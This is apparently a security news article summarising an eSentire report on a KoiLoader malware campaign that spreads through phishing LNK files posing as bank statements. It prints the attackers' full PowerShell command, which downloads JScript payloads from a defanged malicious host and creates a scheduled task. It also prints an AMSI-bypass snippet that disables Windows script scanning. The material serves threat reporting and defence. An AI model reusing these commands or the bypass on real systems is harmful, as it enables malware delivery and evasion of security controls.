Cybersecurity researchers identified a sophisticated malware campaign leveraging a new variant of KoiLoader, a modular payload delivery system notorious for distributing information stealers like Koi Stealer.
This updated strain employs PowerShell scripts embedded within Windows shortcut (LNK) files to bypass traditional detection mechanisms, demonstrating a concerning evolution in attack methodologies.
The campaign’s initial access vector involves phishing emails impersonating financial institutions, luring victims with ZIP archives containing malicious LNK files labeled as bank statements.
.png
)
These files exploit a known Windows vulnerability (ZDI-CAN-25373) to hide command-line arguments, masking their malicious intent during superficial inspection.
eSentire’s Threat Response Unit (TRU) first detected the intrusion during routine threat-hunting operations, observing the malware’s multi-stage deployment chain designed to evade endpoint detection and response (EDR) tools.
The attack begins with a PowerShell command embedded in the LNK file, which downloads two JScript payloads (g1siy9wuiiyxnk.js and i7z1x5npc.js) to establish persistence and execute further malicious activities.
Notably, the threat actors employed scheduled tasks to maintain execution continuity while altering process parentage to mimic legitimate system activity.
.webp)
The malware’s impact extends beyond initial compromise, as KoiLoader facilitates the delivery of Koi Stealer, a C#-based information stealer capable of harvesting credentials, cryptocurrency wallets, and sensitive documents.
Subsequent command-and-control (C2) communications use encrypted HTTP POST requests to exfiltrate victim data, including operating system details, usernames, and domain information.
This campaign shows the growing reliance on living-off-the-land binaries (LOLBins) and script-based attacks to circumvent security controls.
Infection Mechanism: PowerShell and Obfuscated Script Chaining
The infection chain begins when a victim interacts with the LNK file chase_statement_march.lnk, which triggers a truncated PowerShell command.
.webp)
Full analysis revealed the command downloads two JScript files to %ProgramData%, as shown below:-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + '\' + ('g1siy9wuiiyxnk.js i7z1x5npc'); $getf='Dow'+'nl'+'oadF'+'ile'; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = 'wscript '; $w2al9zb7lb86ccs0.$getf('https://casettalecese[.]it/.../hemigastrectomySDur.php', 'g1siy9wuiiyxnk.js'); . ('curl.exe') -s -o 76mk0ik748fo 'https://casettalecese[.]it/.../bivalviaGrr.php'; mv 76mk0ik748fo 'i7z1x5npc.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ("wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc") /tn i7z1x5npc;The first JScript (g1siy9wuiiyxnk.js) deletes the initial scheduled task and relaunches the payload via wscript.exe under svchost.exe to simulate benign activity.
eSentire analysts noted this technique disrupts process ancestry-based detection, as security tools typically associate wscript.exe with user-initiated actions rather than system services.
The secondary script (i7z1x5npc.js) retrieves the victim’s machine GUID from the registry (HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid), generates a unique filename, and fetches two PowerShell scripts: one to disable AMSI (boomier10qD0.php) and another (nephralgiaMsy.ps1) to load KoiLoader into memory (Figure 5).
The AMSI bypass uses reflective code injection:-
$vl1 = ("L8Ek1EOLdflxxTT2W20qMJ0EsGk12dZO5jxvxTT2W20qMJ0EMRc4Ar2q6SDDxTT2W20qMJ0EVEWXewxquV3axTT2W20qMJ0Eybr4BrPdQsbhxTT2W20qMJ0Ez80MpPbbIoRaxTT2W20qMJ0E1zxbk5cQzLZ9xTT2W20qMJ0E8MOQx7eVpj7ZxTT2W20qMJ0EibyPDx89MPoi" -match "xTT2W20qMJ0E")
$v2=$c.GetFields("NonPublic,Static")
Foreach($v3 in $v2) {if ($v3.Name -like "*am*ed") {$v3.SetValue($null, $vl1)}} KoiLoader’s shellcode then decrypts and executes the final payload using XOR keys retrieved from embedded resources.
Researchers highlight its use of API hashing—a custom algorithm to resolve critical functions like FindResourceW and LoadResource—to hinder static analysis.
This multi-stage approach highlights adversaries’ increasing sophistication in blending LOLBin abuse, script obfuscation, and encryption to evade detection.
Organizations are advised to disable wscript.exe via AppLocker, monitor PowerShell execution logs, and deploy behavior-based EDR solutions to mitigate such threats.
Are You from SOC/DFIR Team? - Try Free Malware Research with ANY.RUN - Start Now
